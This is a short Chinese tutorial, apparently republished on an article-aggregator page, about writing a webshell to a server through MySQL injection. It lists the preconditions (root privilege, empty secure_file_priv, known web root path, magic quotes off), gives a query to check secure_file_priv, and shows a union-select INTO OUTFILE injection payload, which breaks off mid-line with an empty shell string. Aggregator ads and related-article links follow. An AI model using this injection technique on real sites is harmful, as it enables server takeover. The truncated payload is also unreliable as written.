V2AS问路
mysql注入getshell
阅读原文时间:2023年07月08日阅读:1

0x00 利用条件

  • root权限
  • secure_file_priv=为空或者在网站根目录下(网站根目录为d:\www,secure_file_priv=d:\也可以)
  • 知道绝对路径
  • gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号

0x01 查看secure_file_priv设置

show global variables like '%secure_file_priv%';

查询结果

  • 5.7.26为null,5.5.29为空

    这里为NULL

0x02 联合注入写shell

select * from users where id=-1 union select 1,2,'' into outfile 'D

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章

PHP 数据库驱动、连接数据不同方式学习笔记
centos linux安全和调优 第四十一节课
My-Blog搭建过程:如何让一个网站从零到可以上线访问

4

Linux 和 ubuntu安装redis

5

mongoDB 学习笔记纯干货(mongoose、增删改查、聚合、索引、连接、备份与恢复、监控等等)

6

第五章 springboot + mybatis(转载)

7

Redis进阶实践之五Redis的高级特性(转载 5)

8

MySQL表名大小写设置

9

容器、微服务和服务网格简史

10

深度长文整理-Redis进阶